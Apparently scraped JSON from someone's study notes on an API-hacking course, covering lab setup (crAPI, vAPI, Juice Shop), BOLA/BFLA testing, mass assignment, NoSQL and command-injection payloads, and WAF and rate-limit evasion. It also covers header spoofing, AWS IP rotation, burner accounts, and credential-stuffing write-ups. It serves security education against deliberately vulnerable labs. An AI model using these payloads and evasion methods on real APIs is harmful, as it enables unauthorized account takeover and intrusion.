              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps","title":"Steps","text":"

1. Start the crAPI application

              cd ~/lab/crapi\nsudo docker-compose start\n

              2. Open the browser, and select \"postman 5555\" in your Foxyproxy addon to proxy the traffic.

              3. Open your local crapi application in the browser: http://localhost:8888

              4. Run postman from the command line:

              postman\n

5. Once Postman is open, click on the \"Capture traffic\" link (at the bottom right of the application). Set up the capture and make sure that the proxy is enabled in the application. A useful shortcut to go to Settings is CTRL-, (comma).

6. Now you are capturing the traffic. Go through your crAPI application and, when done, go to Postman and stop the capture.

7. The final step is to filter out the requests you want and add them to a collection. In the collection, you will be able to organize these requests in folders/endpoints.

              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-out-an-api-specification-using-mitmproxy2swagger","title":"Build out an API specification using mitmproxy2swagger","text":"","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps_1","title":"Steps","text":"

1. From the CLI, run:

              mitmweb\n

              2. Select burp 8080 in the foxyproxy addon in your browser.

              3. Open a tab in your browser with the mitmweb proxy service: http://localhost:8081, and make sure that traffic is being captured there.

              4. Now you are capturing the traffic. Go through your crapi application and when done, turn off the foxyproxy.

              5. In the mitmweb service at http://localhost:8081, go to File>Save. A file called \"flows\" will be downloaded to your download folder.

              6. We need to parse this \"flows\" file into something understandable by Postman. For that, we will use a tool called mitmproxy2swagger, which will transform our captured traffic into an Open API 3.0 YAML file that can be viewed in a browser and imported as a collection into Postman. Run:

              sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow \n# -i: input    |  -o: output   | -p: target   |  -f: force format to the specified.\n

7. Edit spec.yml to remove the \"ignore:\" prefixes where appropriate, and save the changes.

Run mitmproxy2swagger again to populate your spec with examples.

              sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow --examples\n# --examples will grab the previously created spec.yml and will populate it with real examples. We do this in two steps to avoid creating examples for request out of scope.  \n

              8. Open https://editor.swagger.io/ and click on File > Import. Import your spec.yml. The goal here is to validate the structure of your file.

              9. If everything is ok, open the postman application:

              postman\n

              10. In postman, go to File > Import, and select the spec.yml file. After importing it, you will be able to add it to a collection, and compare this collection against that created by browsing just with postman.

              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#data-exposure","title":"Data Exposure","text":"

Quoting directly from the course: \"When making a request to an endpoint, make sure you note the request requirements. Requirements could include some form of authentication, parameters, path variables, headers, and information included in the body of the request. The API documentation should tell you what it requires of you and mention which part of the request that information belongs in. If the documentation provides examples, use them to help you. Typically, you can replace the example values with the ones you're looking for. The table below describes some of the conventions often used in these examples\".

              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#api-documentation-conventions","title":"API Documentation Conventions","text":"Convention Example Meaning : or {} /user/:id /user/{id} /user/2727 /account/:username /account/{username} /account/scuttleph1sh The colon or curly brackets are used by some APIs to indicate a path variable. In other words, \u201c:id\u201d represents the variable for an ID number and \u201c{username}\u201d represents the account username you are trying to access. [] /api/v1/user?find=[name] Square brackets indicate that the input is optional. || \u201cblue\u201d || \u201cgreen\u201d || \u201cred\u201d Double bars represent different possible values that can be used.","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/","title":"Evasion and Combining techniques","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              Resources
              • w3af
              • WAFW00f
              • waf-bypass.com.
              • hacken.io
              • Awesome WAF.

Here are some basic techniques for evading or bypassing common API security controls.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#what-can-trigger-a-waf-web-applicatin-firewall","title":"What can trigger a WAF (Web Applicatin Firewall)?","text":"
• Too many requests for nonexistent resources.
• Too many requests in a short period of time.
• Common SQL or XSS payloads in requests.
• Unusual behaviour (like testing for authorization vulnerabilities).
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-detect-a-waf","title":"How to detect a WAF","text":"

What can a WAF do, given that RESTful APIs are stateless? WAFs use attribution to identify an attacker, relying on: IP address, origin headers, authorization tokens and metadata (patterns of requests, rate of requests and the combination of headers included in the requests).

When it comes to hacking APIs, the best approach is to first use the API as intended. Second, review the API responses for evidence of a WAF (in headers):

1. Headers such as X-CDN mean that the API is leveraging a Content Delivery Network (CDN), which often provides WAFs as a service.

2. Use Burp Suite's Proxy and Repeater to watch whether your requests are being sent to a proxy (a 302 sending you to a CDN).

              3. Use some tools:

nmap -p 80 --script http-waf-detect $ip \n

Also w3af, WAFW00f, and this handy collection of tools: waf-bypass.com.

A great article found when searching for these tools: hacken.io.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques-for-evasion","title":"Techniques for evasion","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burners-accounts","title":"1. Burners accounts","text":"

So there is a WAF. Before attacking, create several extra accounts (or disposable tokens). Watch out! When creating these accounts, make sure you use information not associated with your other accounts:

              - Different names and emails.\n- Different passwords.\n- Use VPN and disguise your IP.\n
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-bypassing-controls-with-string-terminators","title":"2. Bypassing controls with string terminators","text":"

              Simple payloads.

Null bytes and other combinations of symbols are often interpreted as string terminators. When not filtered out, they can terminate the string early and bypass the API security control filters.

Here is an example of a NULL byte included in an XSS payload, combined with a SQL injection attack:

              POST /api/v1/user/profile/update\n--snip--\n\n     {\n        \u201cusername\u201d: \u201c<%00script>alert(1);</%00script>\u201d\n        \u201cpass\u201d:\u00a0\"%00'OR 1=1\"\n}\n
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#3-bypassing-controls-with-case-switching","title":"3. Bypassing controls with case switching","text":"

Switching the case of characters in the payload may prevent the WAF from detecting the attack.
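
A minimal illustration with classic (hypothetical) payloads, where only the letter casing changes:

<script>alert(1)</script>   -->   <sCrIpT>alert(1)</sCrIpT>\n' OR 1=1--   -->   ' oR 1=1--\nSELECT username FROM users   -->   SeLeCt username FrOm users\n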

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#4-bypassing-controls-by-encoding-payloads","title":"4. Bypassing controls by encoding payloads","text":"

              If you are using Burp Suite, the module Decoder is perfect for quickly encoding or decoding a payload.

Trick: double encode your payload.
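
As a sketch, double URL-encoding a payload in Python (the payload is just an example):

from urllib.parse import quote\n\npayload = \"<script>alert(1)</script>\"\nonce = quote(payload, safe=\"\")    # %3Cscript%3Ealert%281%29...\ntwice = quote(once, safe=\"\")      # %253Cscript%253Ealert%25281%2529...\nprint(twice)\n# A WAF that decodes once sees no payload; a backend that decodes twice receives it.\n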

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#tools","title":"Tools","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burpsuite-intruder","title":"1. BurpSuite Intruder","text":"

Also, once you know which encoding technique is the effective one to bypass the WAF, use BurpSuite Intruder (the \"Payload processing\" section under Intruder's Payloads options) to configure your attack. Intruder has some other options worth exploring.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-wfuzz","title":"2. wfuzz","text":"

              wfuzz Cheat sheet.

# Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hacking-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separate requests.  \nwfuzz -z list,a,base64-md5-none \n# this results in three payloads: one encoded in base64, another in md5 and the last with none. \n\n# Each payload can also be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hacking-example.com/api/v2/FUZZ\n
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#testing-rate-limits","title":"Testing rate limits","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rate-limits-what-for","title":"Rate limits. What for?","text":"
• To avoid incurring additional costs associated with computing resources.
              • To avoid falling victim to a DoS attack.
              • To monetize.
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-know-if-rate-limit-is-in-place","title":"How to know if rate limit is in place","text":"
              • Consult API documentation.
• Check the API's headers (x-rate-limit, x-rate-limit-remaining, retry-after).
• Look for response code 429 (Too Many Requests).
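
For example, you could inspect the response headers of a hypothetical endpoint with curl:

curl -sI http://localhost:8888/api/v2/coupon | grep -iE \"x-rate-limit|retry-after\"\n# x-rate-limit: 5\n# x-rate-limit-remaining: 4\n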
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques","title":"Techniques","text":"

              1. Throttle your scanning

              In wfuzz:

              # Units are specified in seconds\n-s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n
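
For example, a throttled scan against a hypothetical endpoint and wordlist:

wfuzz -z file,/usr/share/wordlists/api/objects.txt -s 1 -t 1 -u http://hacking-example.com/api/v2/FUZZ\n# one concurrent connection (-t 1) with a one-second delay between requests (-s 1)\n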

              In BurpSuite:

              Set up Intruder's Resource Pool to limit the rate (in milliseconds).\n

              2. Bypassing paths

Slightly altering the URL path can cause the API provider to handle the request differently, potentially bypassing the rate limit.

              • Adding null bytes.
• Randomly altering the string with various upper- and lowercase letters.
              • Adding meaningless parameters.

              3. Modifying Origin headers

When the API provider uses headers to enforce rate limiting, you can manipulate them (see the example after this list):

              • X-Forwarded-For
              • X-Forwarded-Host
              • X-Host
              • X-Originating-IP
              • X-Remote-IP
              • X-Client-IP
              • X-Remote-Addr
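
A quick sketch of spoofing these headers on a request (hypothetical endpoint; 127.0.0.1 is a common choice of value):

curl -H \"X-Forwarded-For: 127.0.0.1\" -H \"X-Remote-IP: 127.0.0.1\" -H \"X-Originating-IP: 127.0.0.1\" http://hacking-example.com/api/v2/login\n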

              4. Modifying User-agent header

You can use this dictionary: SecLists.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rotating-ip-addresses-with-burpsuite","title":"Rotating IP addresses with BurpSuite","text":"

              Add the extension IP Rotate.

              Requirements to install IP Rotate and have it working:

              • Install the tool Boto3.
              pip3 install boto3\n
              • Install the Jython standalone file from https://www.jython.org/download.html.
• You will need an AWS account in which you can create an IAM user. There is a small cost associated with using the AWS API Gateway. From the IAM Services page, click \"Add Users\" and create a user account with programmatic access selected. On the \"Set Permissions\" page, select \"Attach Existing Policies Directly\". Next, filter policies by searching for \"API\". Select the \"AmazonAPIGatewayAdministrator\" and \"AmazonAPIGatewayInvokeFullAccess\" permissions and proceed to the review page. No tags needed. Skip ahead and create the user. Now, download the CSV file containing your user's access key.
              • Install IP Rotate
• Open the IP Rotate module and copy and paste the access key of the user created in the IAM service.
              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/","title":"Exploiting API Authorization","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bola-broken-object-level-authorization","title":"BOLA - Broken Object Level Authorization","text":"

A BOLA vulnerability allows UserA to request UserB's resources.

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology","title":"Methodology","text":"
              1. Create a UserA account.
              2. Use the API and discover requests that involve resource IDs as UserA.
              3. Document requests that include resource IDs and should require authorization.
              4. Create a UserB account.
5. Obtain a valid UserB token and attempt to access UserA's resources.

              You could also do this by using UserB's resources with a UserA token.
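
As an illustration, with a hypothetical endpoint, resource ID and token, the BOLA test boils down to:

# UserA's resource, requested with UserB's token\nGET /api/v2/user/1001/documents HTTP/1.1\nHost: hacking-example.com\nAuthorization: Bearer <UserB-token>\n\n# A 200 response containing UserA's documents indicates BOLA\n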

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bfla-broken-function-level-authorization","title":"BFLA - Broken Function Level Authorization","text":"

              BFLA is about UserA requesting to create, update, post or delete object values that belong to UserB.

• BFLA request with lateral actions: UserA has the same role or privilege level as UserB.
• BFLA request with escalated actions: UserB has a higher privilege level, and UserA is able to perform actions reserved for UserB.

Basically, BFLA attacks consist of testing various HTTP methods, seeking out actions on other users' resources that you shouldn't be able to perform. Important: be careful with DELETE requests.

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology_1","title":"Methodology","text":"
              1. Postman. Go through the collection and select requests for resources of UserA. Focus on resources for private information. Focus also on HTTP verbs such as PUT, DELETE, POST.
              2. Swap out your UserA token for UserB's.
3. Send GET, PUT, POST, and DELETE requests for UserA's resources using UserB's token.
4. Investigate 200 and 401 response codes, and responses with unusual lengths.

BFLA testing pays special attention to requests that perform privileged actions.
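
As a sketch (hypothetical endpoint and token), a BFLA test swaps the method and the token:

# An action on UserA's resource, sent with UserB's token\nDELETE /api/v2/user/1001 HTTP/1.1\nHost: hacking-example.com\nAuthorization: Bearer <UserB-token>\n\n# A 200 response means UserB can perform privileged actions on UserA's objects\n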

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#tools","title":"Tools","text":"
              • Postman: use the collection variables. Create specific collections for attacks.
• BurpSuite: use the Match and Replace functionality (tab PROXY > OPTIONS) to perform a large-scale replacement of a variable like an authorization token.
              ","tags":["api"]},{"location":"hackingapis/improper-assets-management/","title":"Testing for improper assets management","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              Testing for improper assets management is all about discovering unsupported and non-production versions of an API.

              ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#finding-api-versions","title":"Finding API versions","text":"

              Paths to check out:

              api.target.com/v3\n/api/v2/accounts\n/api/v3/accounts\n/v2/accounts\n

              API versioning could also be maintained as a header:

              Accept: version=2.0\nAccept api-version=3\n

In addition, versioning could also be set within a query parameter or request body:

/api/accounts?ver=2\nPOST /api/accounts\n\n{\n\"ver\":1.0,\n\"user\":\"hapihacker\"\n}\n

Non-production versions of an API might not be protected with the same security controls as the production version.
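
A quick way to hunt for these is to fuzz the version segment of the path; here is a sketch with wfuzz against a hypothetical API:

wfuzz -z list,v1-v2-v3-mobile-internal-test-uat -u http://hacking-example.com/api/FUZZ/accounts\n# compare status codes and response lengths across versions\n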

              ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#exploiting-non-production-old-and-deprecate-api-versions","title":"Exploiting non-production, old and deprecate api versions","text":"

We'll use Postman. We assume that we have built our collection of requests and identified the parameters related to the API version.

0. On the collection, right-click and select \"Run Collection\". On the following screen, you can unmark the requests that don't need to be run. But first, define a Test.

              1. Run a test \"Status code: Code is 200\". In your collection options, go to tab Test and select the option that gives you this code:

              pm.test(\"Status code is 200\", function () { pm.response.to.have.status(200); })\n

2. Run an unauthenticated baseline scan of the crAPI collection with the Collection Runner. Make sure that \"Save Responses\" is checked. Important: review the results from your unauthenticated baseline scan to get an idea of how the API provider responds to requests using supported production versioning. After that, repeat the same scan, this time as an authenticated user, to obtain an authenticated baseline.

              3. Next, use \"Find and Replace\" to turn the collection's current versions into a variable. For that, use Environmental variables.

              4. Run the collection with the variable set to v1, v2, v3, mobile, internal, test, uat..., and check out the different responses.

In the course, we are using the crAPI app, and by replicating these steps you can spot different response codes for the request {{base_url}}/identity/api/auth/{{var}}/check-otp:\n/v1 received a 404 Not Found\n/v2 received a 500 response\n/v3 received a 500 response\n\nAlso, the response body in /v2 is different from the response body in /v3: \n\nThe /v2 password reset request responds with the body:\n{\"message\":\"Invalid OTP! Please try again..\",\"status\":500}\n\nThe /v3 password reset request responds with the body:\n{\"message\":\"ERROR..\",\"status\":500}\n\nThat might be a sign of improper assets management. Going further and testing it, you can discover that /v2 does not limit the number of times we can guess the OTP. With a four-digit OTP, we should be able to brute force it within 10,000 requests. Since this endpoint manages password resets, this vulnerability ultimately allows you to gain control of any account in the system. \n
              ","tags":["api"]},{"location":"hackingapis/injection-attacks/","title":"Injection Attacks","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              The art of fuzzing is knowing which payload to send in the right request with the right tool.

• The right payload can be narrowed down through reconnaissance.
• The right requests are those that include user input (plus headers and URL paths).
• The right tool depends on your fuzzing strategy.

              Yes, when fuzzing we need a strategy.

              1. Identify endpoints (those where client input can interact with a database).

2. Fuzz those endpoints.

              3. Analyze responses:

              - Verbose error message\n- Response code\n- Time in response.\n

4. Identify the technology, version, backend services and security controls.

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#sql-injections","title":"SQL injections","text":"

More about SQL injections. | How to perform a manual attack in SQL | Simple payloads | Tools: SQLmap

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#nosql-injections","title":"NOSQL injections","text":"

              Simple payloads.

APIs commonly use NoSQL databases because they scale well. These databases have unique structures and modes of querying; requests will look alike, but payloads may vary.
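
A few classic MongoDB-style operator payloads, sent in place of a normal JSON value (field names here are hypothetical):

{\"username\":\"admin\", \"password\":{\"$ne\":\"\"}}\n{\"username\":\"admin\", \"password\":{\"$gt\":\"\"}}\n{\"coupon_code\":{\"$nin\":[\"x\"]}}\n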

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#operating-system-command-injection","title":"Operating System Command Injection","text":"

              Simple payloads

Some common operating system commands used in injection attacks:

              • ipconfig
              • dir
              • ver
              • whoami
              • ifconfig
              • ls
              • pwd

              Target:

• URL query strings
• Request parameters
• Headers
• Requests that throw verbose error messages

              Techniques:

              • Pairing multiple commands in a single line.
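
For example, appended to a vulnerable parameter value (the separators are what matter; the commands are placeholders):

; whoami\n&& whoami\n| whoami\n%0a whoami    # URL-encoded newline\n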
              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#xss-cross-site-scripting","title":"XSS Cross-Site Scripting","text":"

              More about Cross-Site Scripting | Simple payloads

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#using-wfuff","title":"Using wfuff","text":"

              Having this request:

              POST /community/api/v2/coupon/validate-coupon HTTP/1.1\nhost: localhost:8888\naccept: */*\norigin: http://localhost:8888\nreferer: http://localhost:8888/shop\nConnection: close\nuser-agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\ncontent-type: application/json\nContent-Length: 29\nsec-fetch-dest: empty\nsec-fetch-mode: cors\nsec-fetch-site: same-origin\nAccept-Encoding: gzip, deflate\naccept-language: en-US,en;q=0.5\nAuthorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\nCache-Control: no-cache\nPostman-Token: 5eb2f69b-6f89-460b-a49f-96c12edc9906\n\n{\"coupon_code\":{\"$ne\":\"-1\"} }\n

              And this response:

              HTTP/1.1 200 OK\nServer: openresty/1.17.8.2\nDate: Mon, 06 Feb 2023 16:05:31 GMT\nContent-Type: application/json\nConnection: close\nAccess-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization\nAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE\nAccess-Control-Allow-Origin: *\nContent-Length: 79\n\n{\"coupon_code\":\"TRAC075\",\"amount\":\"75\",\"CreatedAt\":\"2022-11-11T19:22:26.134Z\"}\n

              We can use wfuzz like this:

              wfuzz -z file,/usr/share/wordlists/nosql.txt -H \"Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\" -H \"Content-Type: application/json\" -d \"{\\\"coupon_code\\\":FUZZ}\" --sc 200 -p localhost:8080 http://localhost:8888/community/api/v2/coupon/validate-coupon\n# -p localhost:8080 Redirect traffic to BurpSuite\n# --sc 200 Show code response 200\n
              ","tags":["api"]},{"location":"hackingapis/mass-assignment/","title":"Mass assignment","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#what-is-mass-asset-management","title":"What is mass asset management?","text":"

Basically, the frontend tells UserA that they can post/update certain object attributes, and we use that request to post/update different ones. We send a request that updates or overwrites server-side variables.

              Example:

During registration you are supposed to send only these parameters:

              {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    }\n

              But you send this:

              {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    \"credit\":10000\n}\n

And now your newly created user will have a credit of 10,000 units.

Other key-value pairs that you could include in the JSON POST body:

              \"isadmin\": true,  \n\"isadmin\":\"true\",  \n\"admin\": 1,  \n\"admin\": true,\n

The key to this vulnerability is identifying vectors and entry points.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#methodology","title":"Methodology","text":"

              Identify endpoints that accept user input in your collection and that have the potential to modify objects. In the crAPI application this was about taking a BFLA to the next level:

• Changing the request \"GET /workshop/api/shop/products\" (which displays existing products) to \"POST /workshop/api/shop/products\" makes the app respond with a 400 Bad Request code and suggested fields for a POST request. Basically, this POST request is a way to alter or create store products. So we can create our own product items.
• Now we can create a product with a negative price. Acquiring that item will give you credit!
              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#finding-mass-assignment-targets","title":"Finding Mass assignment targets","text":"

To discover and exploit mass assignment vulnerabilities, search for API requests that accept and process client input:

              1. Account registration

               - Intercept the web request\n- Craft this request with admin variables that you can set from API documentation\n

              2. Unauthorized access to organizations: If your user's objects belong to an organization with access to sensitive data, attempt to gain access to that organization.

              3. Resetting passwords, updating accounts, profiles or organizational objects: Do not limit yourself to the account registration process.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#tools","title":"Tools","text":"

BurpSuite Intruder + Param Miner, and Arjun.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#using-param-miner-extension","title":"Using Param Miner extension","text":"

1. Spot sections focused on privileged actions, indicated by headers or fields like:

- Token: AdminToken\n- Or in the JSON body: isadmin: true\n

A nice way to do this is with the Burp extension Param Miner.

Param Miner can be downloaded from the BApp Store in BurpSuite. To run it, right-click on a request (for instance, a request in Repeater) and select Extensions > Param Miner > Guess params > Guess JSON parameter.

Now go to the Extender tab > Extensions. In the box below, select the Output tab, and then \"Show in UI\":

              After a while you will see results from the attack.

With Param Miner you can fuzz unknown variables.

              ","tags":["api"]},{"location":"hackingapis/mass-assignment/#arjun","title":"Arjun","text":"

              More about arjun.

              Arjun is a great tool for finding query parameters in URL endpoints.

Advantages: it supports GET/POST/POST-JSON/POST-XML requests, and it deals with rate limits and timeouts.

# Run arjun against a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun}' --stable\n# -m Get method parameters GET/POST/JDON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

              Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

              ","tags":["api"]},{"location":"hackingapis/other-labs/","title":"Setting up the labs + Writeups","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

Here we'll be practising what we have learned in the course. There are plenty of labs in the wild; my intention here is to cover only the well-known ones.

Also, to round things off, I will include the writeups for every lab.

              ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-crapi","title":"Setting up crAPI","text":"

              Download it from: https://github.com/OWASP/crAPI

              mkdir ~/lab\ncd ~/lab\nsudo curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml\nsudo docker-compose pull\nsudo docker-compose -f docker-compose.yml --compatibility up -d\n
              ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-other-labs","title":"Setting up other labs","text":"

              Besides \"crapi\" and \"vapi\", the book \"Hacking APIs\" indicates some other interesting labs. Following chapter 5 of Hacking APIs book (\"Setting up vu\u00f1nerable API targets\"), I have installed:

              ","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-app","title":"vapi app","text":"

              Source: https://github.com/roottusk/vapi

APIs have become a critical element of the security landscape. In 2019, OWASP released a list of the top 10 API security vulnerabilities for the first time. vAPI stands for Vulnerable Adversely Programmed Interface, and it's a self-hostable PHP interface that mimics OWASP API Top 10 scenarios.

              Install

# Under /home/kali/labs\ngit clone https://github.com/roottusk/vapi.git\ncd vapi\ndocker-compose up -d\n# prerequisite: having docker up and running\n

              Setting up Postman

              • Go to https://www.postman.com/roottusk/workspace/vapi/
              • Locate and import vAPI.postman_collection.json in Postman
              • Locate and Import vAPI_ENV.postman_environment.json in Postman
              • Configure the collection to use vAPI_ENV
              ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-devslop-pixi","title":"OWASP DevSlop Pixi","text":"

Pixi is a MongoDB, Express.js, Angular, Node (MEAN) stack web application that was designed with deliberately vulnerable APIs.

              To install it:

cd ~/lab\ngit clone https://github.com/DevSlop/Pixi.git\n

              To run it:

              cd ~/lab\nsudo docker-compose up\n

              Now, in the browser, go to: http://localhost:8000/login

              ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-juice-shop","title":"OWASP Juice Shop","text":"

              Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications.

To install, go to the GitHub page (https://github.com/juice-shop/juice-shop) and follow the instructions.

              To run it:

              sudo docker run --rm -p 3000:3000 bkimminich/juice-shop\n

              Now, in the browser, go to: http://localhost:3000/#/

              ","tags":["api"]},{"location":"hackingapis/other-labs/#damn-vulnerable-graphql-application","title":"Damn-Vulnerable-GraphQL-Application","text":"

Damn Vulnerable GraphQL Application (DVGA) is a deliberately vulnerable GraphQL application that can be used to learn about GraphQL/API related vulnerabilities.

              To install, see the github page: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application

              To run it:

              sudo docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga\n

              Now, in the browser, go to: http://localhost:5013/

              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeups","title":"Writeups","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-writeup","title":"VAPI Writeup","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api1","title":"Writeup: API1","text":"

Tip provided by vAPI: Broken Object Level Authorization. You can register yourself as a User. That's it... or is there something more?

              Solution:

              • Postman: Under folder API0, send a request to Create User. When done, the vAPI_ENV will be filled with two more variables: api1_id, api1_auth.
• Postman: Under folder API1, send a request to Get User. Initially you will get the user that you have created. BUT if you modify api1_id in the vAPI_ENV environment, then you will receive the data of (let's say) the user with id 1. Or 2. Or 3. Or... Tadam! BOLA.
              • The flag is in user with id 1. See the response body:
              ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api2","title":"Writeup: API2","text":"

Tip provided by vAPI: Broken Authentication. We don't seem to have credentials for this. How do we log in? (There's something in the Resources folder given to you.)

              Solution:

              • Download creds.csv from https://raw.githubusercontent.com/roottusk/vapi/master/Resources/API2_CredentialStuffing/creds.csv.
              • Execute:
              cat creds.csv | cut -d, -f1 >users.txt\ncat creds.csv | cut -d, -f3 >pass.txt\n
• Turn Intercept mode ON in Burp, enable FoxyProxy at 8080 in the browser, and enable the proxy in Postman at 8080.
              • Postman: Under folder API2, send a POST request to login and intercept it with Burp.
• Burp: send the request to Intruder. Use a Pitchfork attack with two payloads (Simple list): the first will be users.txt and the second pass.txt. Careful: remove the URL encoding when setting up the payloads.
              • Burp: sort by Code (or length). You will get credentials for three users.
• Postman: Log in with the credentials of each user and save the response as an example, in case you need to go back to it.
• Postman: Once you are logged into the app, a new environment variable has been saved in vAPI_ENV: api2_auth. With this authentication we can now resend the Get Details request. The flag will be in the response.
